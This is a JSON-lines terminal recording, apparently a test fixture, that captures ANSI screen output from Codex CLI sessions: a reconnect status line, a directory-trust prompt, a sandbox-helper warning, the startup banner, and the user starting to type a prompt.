{"delayMs":0,"data":"\u001b[21;9H\u001b[2me\u001b(B\u001b[mc\u001b[4C\u001b[1m.\u001b(B\u001b[m.\u001b[29C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;10H\u001b[2mc\u001b(B\u001b[mt\u001b[4C\u001b[1m.\u001b(B\u001b[m.\u001b[28C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":25,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;11H\u001b[2mt\u001b(B\u001b[mi\u001b[4C\u001b[1m.\u001b(B\u001b[m \u001b[2m4\u001b(B\u001b[m\u001b[26C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;27H\u001b[2m, url: ws\u001b[C:/\u001b[Capi.openai.com/v1/responses, cf-ray: a2831d0298dca625-ZRH,\u001b(B\u001b[m\u001b[C\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[24;98H\u001b[2m…\u001b[27;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;12H\u001b[2mi\u001b(B\u001b[mn\u001b[4C\u001b[1m \u001b(B\u001b[m4\u001b[26C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;13H\u001b[2mn\u001b(B\u001b[mg\u001b[4C\u001b[1m4\u001b(B\u001b[m/\u001b[25C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;14H\u001b[2mg\u001b(B\u001b[m.\u001b[4C\u001b[1m/\u001b(B\u001b[m5\u001b[24C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;15H\u001b[2m.\u001b(B\u001b[m.\u001b[4C\u001b[1m5\u001b(B\u001b[m\u001b[24C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[21;16H\u001b[2m.\u001b(B\u001b[m.\u001b[28C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;17H\u001b[2m.\u001b(B\u001b[m \u001b[27C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;18H\u001b[2m \u001b(B\u001b[m4\u001b[26C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;19H\u001b[2m4\u001b(B\u001b[m/\u001b[25C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;20H\u001b[2m/\u001b(B\u001b[m5\u001b[24C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[21;1H•\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;21H\u001b[2m5\u001b(B\u001b[m\u001b[24C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":1,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;24H\u001b[2m4\u001b(B\u001b[m\u001b[21C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[21;1H\u001b[2m◦\u001b[27;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[6AR\u001b[42C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[6A\u001b[1mR\u001b(B\u001b[me\u001b[41C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;4H\u001b[1me\u001b(B\u001b[mc\u001b[40C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;5H\u001b[1mc\u001b(B\u001b[mo\u001b[39C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;6H\u001b[1mo\u001b(B\u001b[mn\u001b[38C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;7H\u001b[1mn\u001b(B\u001b[mn\u001b[37C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[6AR\u001b[4C\u001b[1mn\u001b(B\u001b[me\u001b[36C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[6A\u001b[2mR\u001b(B\u001b[me\u001b[4C\u001b[1me\u001b(B\u001b[mc\u001b[35C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[21;1H•\u001b[2C\u001b[2me\u001b(B\u001b[mc\u001b[4C\u001b[1mc\u001b(B\u001b[mt\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;5H\u001b[2mc\u001b(B\u001b[mo\u001b[4C\u001b[1mt\u001b(B\u001b[mi\u001b[33C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;99H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
@@ -0,0 +1,154 @@
|
||||
{"scenario":"streaming-real","cols":100,"rows":30,"codexVersion":"codex-cli 0.147.0","recordedAt":"2026-08-09T09:31:57.351Z"}
|
||||
{"delayMs":0,"data":"\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?2004h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[c\u001b[>c\u001b[>q\u001b]10;?\u001b\\\u001b]11;?\u001b\\\u001b[1;1H"}
|
||||
{"delayMs":1,"data":"\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[1;1H\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[H"}
|
||||
{"delayMs":35,"data":"\u001b[32m\u001b[1markon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-SFpno1\u001b(B\u001b[m$ "}
|
||||
{"delayMs":647,"data":"exec codex\r\n"}
|
||||
{"delayMs":479,"data":"\u001b[30d\n\u001b[K\u001b[2d\u001b[J\u001b[H\u001b[K\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":2,"data":">\u001b[C\u001b[1mYou are in \u001b(B\u001b[m/home/arkon/default/claudeman-predictive/tmp/codexrec-work-SFpno1\u001b[3;3H\u001b[33mNote: You’re in a subdirectory of a Git project. Trusting will apply to the repository root:\u001b[4;3H/home/arkon/default/claudeman\u001b[6;3H\u001b[39mDo\u001b[Cyou\u001b[Ctrust\u001b[Cthe\u001b[Ccontents\u001b[Cof\u001b[Cthis\u001b[Cdirectory?\u001b[CWorking\u001b[Cwith\u001b[Cuntrusted\u001b[Ccontents\u001b[Ccomes\u001b[Cwith\u001b[Chigher\u001b[7;3Hrisk\u001b[Cof\u001b[Cprompt\u001b[Cinjection.\u001b[CTrusting\u001b[Cthe\u001b[Cdirectory\u001b[Callows\u001b[Cproject-local\u001b[Cconfig,\u001b[Chooks,\u001b[Cand\u001b[Cexec\u001b[8;3Hpolicies\u001b[Cto\u001b[Cload.\u001b[10;1H\u001b[36m› 1. Yes, continue\u001b[11;3H\u001b[39m2.\u001b[CNo,\u001b[Cquit\u001b[13;3H\u001b[2mPress enter to continue\u001b[?25l\u001b(B\u001b[m"}
|
||||
{"delayMs":3830,"data":"\u001b[?7727h\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H\u001b[1;30r\u001b[13;26H\u001b[?25l"}
|
||||
{"delayMs":1,"data":"\u001b[H>\u001b[1X\u001b[1m\u001b[CYou are in \u001b(B\u001b[m/home/arkon/default/claudeman-predictive/tmp/codexrec-work-SFpno1\u001b[K\r\n\u001b[K\u001b[3;2H\u001b[1K\u001b[33m\u001b[CNote: You’re in a subdirectory of a Git project. Trusting will apply to the repository root:\u001b[39m\u001b[K\u001b[4;2H\u001b[1K\u001b[33m\u001b[C/home/arkon/default/claudeman\u001b[39m\u001b[K\r\n\u001b[K\u001b[6;2H\u001b[1K\u001b[CDo\u001b[1X\u001b[Cyou\u001b[1X\u001b[Ctrust\u001b[1X\u001b[Cthe\u001b[1X\u001b[Ccontents\u001b[1X\u001b[Cof\u001b[1X\u001b[Cthis\u001b[1X\u001b[Cdirectory?\u001b[1X\u001b[CWorking\u001b[1X\u001b[Cwith\u001b[1X\u001b[Cuntrusted\u001b[1X\u001b[Ccontents\u001b[1X\u001b[Ccomes\u001b[1X\u001b[Cwith\u001b[1X\u001b[Chigher\u001b[K\u001b[7;2H\u001b[1K\u001b[Crisk\u001b[1X\u001b[Cof\u001b[1X\u001b[Cprompt\u001b[1X\u001b[Cinjection.\u001b[1X\u001b[CTrusting\u001b[1X\u001b[Cthe\u001b[1X\u001b[Cdirectory\u001b[1X\u001b[Callows\u001b[1X\u001b[Cproject-local\u001b[1X\u001b[Cconfig,\u001b[1X\u001b[Chooks,\u001b[1X\u001b[Cand\u001b[1X\u001b[Cexec\u001b[K\u001b[8;2H\u001b[1K\u001b[Cpolicies\u001b[1X\u001b[Cto\u001b[1X\u001b[Cload.\u001b[K\r\n\u001b[K\u001b[36m\r\n› 1. Yes, continue\u001b[39m\u001b[K\u001b[11;2H\u001b[1K\u001b[C2.\u001b[1X\u001b[CNo,\u001b[1X\u001b[Cquit\u001b[K\r\n\u001b[K\u001b[13;2H\u001b[1K\u001b[2m\u001b[CPress enter to continue\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[13;26H"}
|
||||
{"keyAt":true,"data":"\r"}
|
||||
{"delayMs":235,"data":"\u001b[2;1H\u001b[J\u001b[H\u001b[K"}
|
||||
{"delayMs":0,"data":"\u001bM\u001bM\u001bM\r\n\u001b[33m⚠\u001b[39m\u001b[1;3r\u001b[3;1H\n\u001b[1;2H\u001b[33m Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\r\n\u001b[39m \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\u001b[39m\r\n\u001b[K\u001b[1;30r\u001b[3;1H"}
|
||||
{"delayMs":1,"data":" \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[5;1H\u001b[39m\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n│ model: \u001b[3mloading\u001b(B\u001b[m\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-SFpno1\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[13;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills t\u001b(B\u001b[m\u001b[2mo list available skills\u001b[15;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-terra default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-SFpno1\u001b[13;3H\u001b[?12l\u001b[?25h\u001b(B\u001b[m"}
|
||||
{"delayMs":10,"data":"\u001b[5;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[13;39H\u001b[K\u001b[15;82H\u001b[K\u001b[13;3H"}
|
||||
{"delayMs":12,"data":"\u001b[5;52H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[13;39H\u001b[K\u001b[15;82H\u001b[K\u001b[13;3H"}
|
||||
{"delayMs":208,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[5;1H\u001b[J\u001b[A\u001b[K\u001b[4;30r\u001b[4;1H\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001bM\u001b[1;30r\u001b[5;1H"}
|
||||
{"delayMs":0,"data":"\u001b[2m╭─────────────────────────────────────────────────╮\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\r\n│ │\r\n\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":"\u001b[2m│ model: \u001b(B\u001b[mgpt-5.6-terra\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-SFpno1\u001b[2m │\r\n╰─────────────────────────────────────────────────╯\u001b[12;1H\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":" \u001b[1mTip:\u001b(B\u001b[m \u001b[3mNew\u001b(B\u001b[m For a limited time, Codex is included in your plan for free – let’s build together.\u001b[14;1H•\u001b[C\u001b[2mBooting MCP server: codex_apps\u001b[C(0s • esc to interrupt)\u001b[17;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[19;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-terra default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-SFpno1\u001b[17;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":0,"data":"\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":19,"data":"\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":1,"data":"\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":33,"data":"\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":1,"data":"\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":33,"data":"\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":33,"data":"\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":34,"data":"\u001b[?25l\u001b[?12l\u001b[?25h\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":28,"data":"\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":34,"data":"\u001b[14;57H\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[3AB\u001b[53C\u001b[K\u001b[17;39H\u001b[K\u001b[19;82H\u001b[K\u001b[17;3H"}
|
||||
{"delayMs":2,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":5,"data":"\u001b[14;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":1,"data":"\u001b[2B\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[17;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-terra default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-SFpno1\u001b[15;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":279,"data":"\u001b[36C\u001b[K\u001b[17;82H\u001b[K\u001b[15;3H"}
|
||||
{"delayMs":86,"data":"\u001b[36C\u001b[K\u001b[17;82H\u001b[K\u001b[15;3H"}
|
||||
{"delayMs":71,"data":"\u001b[36C\u001b[K\u001b[17;82H\u001b[K\u001b[15;3H"}
|
||||
{"keyAt":true,"data":"r"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"keyAt":true,"data":"p"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"keyAt":true,"data":"y"}
|
||||
{"keyAt":true,"data":" "}
|
||||
{"keyAt":true,"data":"w"}
